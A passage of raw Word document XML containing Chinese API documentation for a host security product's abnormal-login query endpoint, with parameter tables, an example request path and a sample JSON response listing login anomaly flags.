      <w:tr w:rsidR="00497C54" w14:paraId="0557CC8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B6EDE99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="275E7870" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E3F26E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07C4009A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="78A4A9A0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="144DC31D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0642FD3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52F9CE7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5473C6F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68FF8EC0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="600C4C4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52D7CC1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BBE3978" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BAF8EA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录时间，格式参考</w:t>
            </w:r>
            <w:hyperlink w:anchor="通用get请求参数类型及说明">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>通用Get请求参数类型及说明</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3CA6C5BC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F145AE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AF03320" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BE618FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35594487" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常登录类型:2-异常IP;3-异常区域;4-异常时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A1EEC3D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64FC9D34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A27C0E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72208F7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="662DE7B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3BE3DE2E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F599FB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C507112" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="050E6741" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="149BE66F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5700CBCE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FCF6AD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>clientIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4342BC08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72345765" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D09AB63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>来源IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0F043D76" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54978BAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54D676FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="429FAD83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02D0601F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（windows无该参数）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30B69430" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675FC862" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/abnormallogin/linux?page=0&amp;size=50&amp;group=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6097345C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C0A8AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "dbcf7ac1b5537764",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.12.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.138",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "172.16.12.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了mysql或者DNSmasq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签b"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "oldtcm",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "loginTime": 1523262390,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "uname": "qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "clientIp": "58.49.121.58",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "clientLocation": "湖北武汉",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "evilIpDb": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "crackSuccess": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "abnormalIp": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "abnormalLocation": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "abnormalTime": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3113ED55"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968"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3181"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2F7C72A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484B2B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51C8F257" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2505E7F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EA0F24D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7B210BC6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="544836AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71669743" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07C5CE51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A88BF55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="30E79101" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DCD9A59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13A72612" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E6C3CEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="696A5FBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="77270F95" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EB2A7CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66DC7EDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33FC2693" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B60AF04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="428B6C69" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="308DACF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46310726" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61EC15F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3913AAC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35CD9349" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79CAC2FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72A79C15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="231BBDC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A4B4CC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4C668661" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A983076" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B87E9A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="181B436C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68F64FF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="496378E4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="143E144D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C9D9861" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34EB82E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A08A9B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F57E3E2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0821B180" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FA339D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03EECBBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B0AFB4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="64C38FE8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19CE3B62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17C8CFD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
